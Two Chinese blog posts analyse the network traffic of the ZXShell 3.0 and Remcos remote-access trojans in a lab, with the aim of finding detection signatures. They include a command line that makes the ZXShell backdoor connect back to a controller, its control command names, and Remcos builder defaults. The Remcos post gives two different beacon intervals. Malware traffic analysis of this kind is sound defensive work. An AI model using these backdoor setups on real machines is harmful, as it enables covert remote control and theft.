zxshell3.0后门程序通信数据简单分析

前言: 这是一个很就很久以前的远控了,这东西好像当时用的人比较少。今天在网上发现了于是下载下来分析一下。软件轻巧简洁,功能也比较齐全,唯一感觉不足的是配置个人感觉比较麻烦。软件的介绍及简单使用说明在压缩包里的“必读.txt”,这里不再赘述,本文主要从后门通信的数据流量角度去分析,文末附远控样本及分析过程中的数据包。 文件目录 zxshell3压缩包里面包含以下文件: ├─Controller.exe 控制端,用来操控上线的服务端 ├─ctrldll.dll Controller.exe的模块,主要负责远程桌面时拦截本地系统一些热键。 ├─qqwry.dat ip到地理位置的数据库,可以自己下载更新的版本代替它 ├─srv │ ├─myip.txt 放在http服务器配合上线通知的用的,如果直接通过域名解析则无需用到此文件 │ ├─ZXCFG.exe 配置ZXShell.exe的默认安装参数 │ ├─zxplug.rar ZXPlug插件功能, 如何添加自定义命令的一个例子 │ └─ZXShell.exe 服务端,console版本,有几个参数,可以在cmd 下通过 -help 参数获得详细信息 └─必读.txt 程序适应平台:2000/xp/vista(在测试的时候发现win7上也可正常运行)。 分析环境 控制端:win7虚拟机 (10.0.3.160) 服务端:win7虚拟机(10.0.3.172) 上线端口默认为1985 分析过程 下面将从样本的上线、远程桌面、文件控制、命令执行等操作指令的流量数据特征进行分析。 样本配置 样本的配置如下图 控制端默认设置监听端口1985,填好配置的上线密码如下图 样本配置好后,控制端点击右边的启动按钮开始监听。将生成的样本放到服务端(10.0.3.172)上并运行。(由于本地测试就没有使用外网上行的方式,采用的本地测试上线方式),在10.0.3.172上打开一个CMD,执行“puliic_ZXShell.exe -ip 10.0.3.160 -port 1985 -filename c:\ctrldll.dll -test”,可以看见会释放一个ctrldll.dll文件到我们指定的目录下 此时我们回到控制端,可以看到已经上线 上线后可以看到服务端的版本、IP、地理位置、信通信息等信息。 此时我们可以从服务端上抓取的两台机器通信的数据包中可以看到上线帧。上线之后同多数远控一样,自动发送本机的一些基本信息给控制端,如下图 此时我们点击控制端上的“系统信息”,获取服务端电脑信息。可以看到,与上线帧里面获取的系统信息不通的是,此时服务端返回的信息系统信息更加详细。 抓到的数据包: 可以发现,控制端首先发送指令“sysinfo”给服务端,随后服务端分两个包返回了系统信息。 远程桌面 指令为:winvnc 视频监视 指令为:capsrv 获取一个CMD 指令为:getcmd 获取CMD后我们执行一条命令:calc.exe,打开服务端电脑上的计算器。 ...

2017年5月12日 · 1 分钟 · lucien116

Ramcos远控木马样本分析报告

样本来源http://Breaking-Security.net样本类型Win32.Backdoor.Remcos.Agba分析时间2016-9-7运行环境Windows7 x64分析目的找出木马被控端与控制端通信的特征码分析过程(1) 配置木马端 图1-配置木马 1. 木马端默认配置使用2404端口,也可自行更改为其他端口。 2. 可设置上线密码,默认密码为pass。 3. 其他设置,配置过程中可设置后门安装目录,键盘记录等其他功能,部分功能需要升级到专业版才能使用,如图2。 图2-安装设置 4. 选择压缩方式后点击Builde,完成创建。如下图 图3-生成木马样本 (2) 安装木马样本 1. 在主机1(IP:10.0.3.154)上打开控制端,安装生成的木马样本(Backdoor.exe)到主机2(IP:10.0.3.159). 2. 在主机1上开启Wireshark抓取主机1与主机2之间的通信数据,同时在主机2上打开进程监控工具。 3. 在主机2上双击安装木马样本。 (3) 开始分析 进程监视,样本安装后通过进程监视器可以看到,系统会生成进程名为Backdoor.exe的新进程,同时会进行镜像加载、查询注册表键值等一系列操作。如图4: 图4-进程监视 通过对主机1和主机2之间通信的数据包分析可发现,木马端在主机2上安装后,打开一个随机端口主动连接控制端2404端口。如图5: 图5-连接端口 3. 样本采用未知编码方式加密,从通信数据流中可以看出使用默认密码时样本通信特征码为:1b84d5b05df4c493c530c2. 如图6: 图6-通信特征 若配置样本时不使用默认密码(自定义连接密码为123456),通过wrieshark抓包分析,特征值改变,如图7: 图7-修改连接密码后的特征值 5. 统计后发现若控制端未打开,木马上线后连接请求频率约6秒一次。 数据记录 和计算无结 论1. 使用默认密码时的样本数据特征: 1b84d5b05df4c493c530c2 2. 样本特征值会随配置时设置连接密码的不同而改变 3. 默认配置下木马端主动连接控制端TCP2404端口(端口可更改) 4. 木马上线连接请求频率约5秒一次。

2016年9月20日 · 1 分钟 · lucien116